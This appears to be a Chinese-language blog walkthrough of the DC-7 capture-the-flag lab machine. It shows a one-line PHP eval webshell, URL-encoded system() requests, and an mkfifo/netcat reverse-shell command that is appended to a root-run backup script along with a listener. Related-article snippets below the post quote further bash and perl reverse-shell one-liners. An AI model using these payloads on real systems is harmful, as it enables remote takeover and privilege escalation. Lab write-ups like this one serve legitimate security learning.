DC-7靶机反弹php shell

最新推荐文章于 2023-04-23 15:51:39 发布
最新推荐文章于 2023-04-23 15:51:39 发布
阅读量262 收藏
点赞数
分类专栏: 渗透测试 文章标签: 反弹shell DC-7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zx520113/article/details/108274488
版权

     在对靶机DC-7进行渗透测试学习时,发现无法使用介绍的方法echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.135 1234 >/tmp/f" >> backups.sh进行反弹shell提权。

    前面的步骤与网上介绍的方法一样,这里不做过多阐述。后台账号密码:dc7user/MdR3xOgB7#dW

    ssh dc7user@192.168.23.142远程登录dc7user账号,在/var/www/html目录下执行drush user-password admin --password="123456"

    登录该网站后台账号密码:admin,123456

    手动安装 PHP filter 模块后,上传一句话木马:<?php @eval($_GET['admin']);?>

    查看/opt/scripts/backups.sh文件内容:http://192.168.23.142/node/preview/51ffa862-4bd0-494d-bdd4-b2ebbb9afaa4/full?admin=system(%22cat%20/opt/scripts/backups.sh%22);

    通过echo将反弹shell语句写入到backups.sh文件:

    http://192.168.23.142/node/preview/51ffa862-4bd0-494d-bdd4-b2ebbb9afaa4/full?admin=system(%22echo%20rm%20\/tmp\/f\;mkfifo%20\/tmp\/f\;cat%20\/tmp\/f\|\/bin\/sh%20\-i%202\%3E\%261\|nc%20192.168.23.135%201234%20\%3E\/tmp\/f%3E%3E/opt/scripts/backups.sh%22);

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.135 1234 >/tmp/f" >> backups.sh
首先对反弹执行代码进行编译:
rm \/tmp\/f\;mkfifo \/tmp\/f\;cat \/tmp\/f\|\/bin\/sh \-i 2\>\%261\|nc 192.168.23.135 1234 \>\/tmp\/f
通过system写入:
http://192.168.23.142/node/preview/51ffa862-4bd0-494d-bdd4-b2ebbb9afaa4/full?admin=system(%22echo%20rm%20\/tmp\/f\;mkfifo%20\/tmp\/f\;cat%20\/tmp\/f\|\/bin\/sh%20\-i%202\%3E\%261\|nc%20192.168.23.135%201234%20\%3E\/tmp\/f%3E%3E/opt/scripts/backups.sh%22);
查看:
http://192.168.23.142/node/preview/51ffa862-4bd0-494d-bdd4-b2ebbb9afaa4/full?admin=system(%22cat%20/opt/scripts/backups.sh%22);
开一个窗口进行监听:
nc -lvvp 1234监听
在dc7user后台中,在/opt/scripts/目录下执行./backups.sh
反弹shell成功

 

zx520113
关注
专栏目录
DC-3 靶机
weixin_63492470的博客
03-11 5462
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
DC-9 靶机渗透
Rex_Surprise的博客
05-10 362
DC-9 靶机渗透 1. 渗透过程 THE_END! DC-9 靶机渗透1. 渗透过程 初期脚本扫描 扫描结果 可以发现 ip地址为:192.168.0.114 ssh (但是ssh无法访问了) 和 http服务s 但是没有其他可用的信息 爆破一下目录 我这里用御剑爆破 输入url: http://192.168.0.114...
渗透测试学习之靶机DC-7
xdbzdgx的博客
12-05 2570
1.下载靶机 本篇文章是DC靶机系列的第7篇,针对的是靶机DC-7,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-7的下载地址为DC: 7 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-7只有一个flag。 在VMware加载成功之后并开启,建议把DC-7靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
DC-7(两次反弹
JyajT的博客
04-23 103
这里用了两次反弹shell,一次从网站到kali,另一次是从kali到kali开始在蚁剑无法连接上卡了很久,实在是没整出来,所以选择直接利用php的system来反弹第一个shell在第二反弹shell的时候利用了命名管道mkfio,但是无法成功返回,发现有的博主是直接蚁剑的backups.sh文件中利用nc反弹(当然前提是第一次用工具反弹成功了)总之还是要根据框架(drupal8)去寻找突破口关于drush命令和mkfifo()的使用这里也使用了重定向来写入数据。
各种反弹shell原理
haoge1998的博客
04-18 1万+
各种反弹shell原理 一、理解反弹shell 1、为什么需要反弹shell 当正向连接不可达时候 客户机中了木马,但是在局域网内,无法正向连接。 由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求 2、原理 反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端 二、常用的反弹shell命令 1、bash进行反弹 (1)在windows上启动监听端口 nc -lvp 4444 l:代表入站监听 v:代表输出信息级别 p:代表监听的端口 (2)在Lin
命令执行漏洞和代码执行漏洞详解 一文了解命令执行漏洞和代码执行漏洞
闵行小鱼塘
11-08 2838
本篇总结归纳命令执行漏洞(RCE)和代码执行漏洞
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6125
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1961
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
【vulnhub】---DC-6靶机
qq_43168364的博客
08-21 681
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1214
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
靶机bulldog2练习:通过反弹shell进行提权
7Riven's blog
11-22 968
环境:kali机一台:192.168.109.142、靶机bulldog2一台:192,168.109.149 扫描网段:发现有主机IP地址为192.168.109.149,存活 扫描发现目标的目标主机信息如下: -sV :版本探测 -sT :TCP connect()扫描 -sC :脚本扫描通过选项被激活 -p-:从端口1扫描到65535 -T5个级别:paranoid (0...
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1256
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
反弹shell工具推荐
weixin_30861459的博客
02-21 874
Reverse Shell Cheat Sheet Bash TCP bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 &...
N种反弹shell方法汇总
W小哥
03-09 462
bash: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Perl 1: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton(...
kali修改文件权限不够_Linux下的权限维持
weixin_39956036的博客
10-21 2131
Linux权限维持0X00 关于权限维持什么是权限维持?我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制住目标.0X01 获得初始权限Linux有很多种反弹shell的方法,反弹shell的好处主要是操作过程中会更加方便,对我个人来说,主要是命令补全,总之,从权限维持的角度来说,可以更好的去执行一些操作.能否反弹shell,要根...
Web渗透中的反弹Shell与端口转发的奇淫技巧
大方子
10-02 9643
奇淫技巧 0x00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0x01 反弹shell 1) Bash 部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口   bash -i &gt;&amp; /dev/tcp/x.x.x.x/2333 0&g...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1406
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
虚拟机安装安卓模拟器
SingWeek
09-01 7135
1、下载并安装VMare虚拟机,下载安卓版本软件包。 相关功能可参考: 安装官方VMDK下载:https://www.osboxes.org/android-x86/#android-x86-8-vmware 安卓安装软件及命令使用:https://blog.csdn.net/weixin_43913500/article/details/88760557 VMDK安装:https://blog.csdn.net/gb4215287/article/details/78245707 2、VMare
渗透DC-1靶机设计思路
最新发布
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值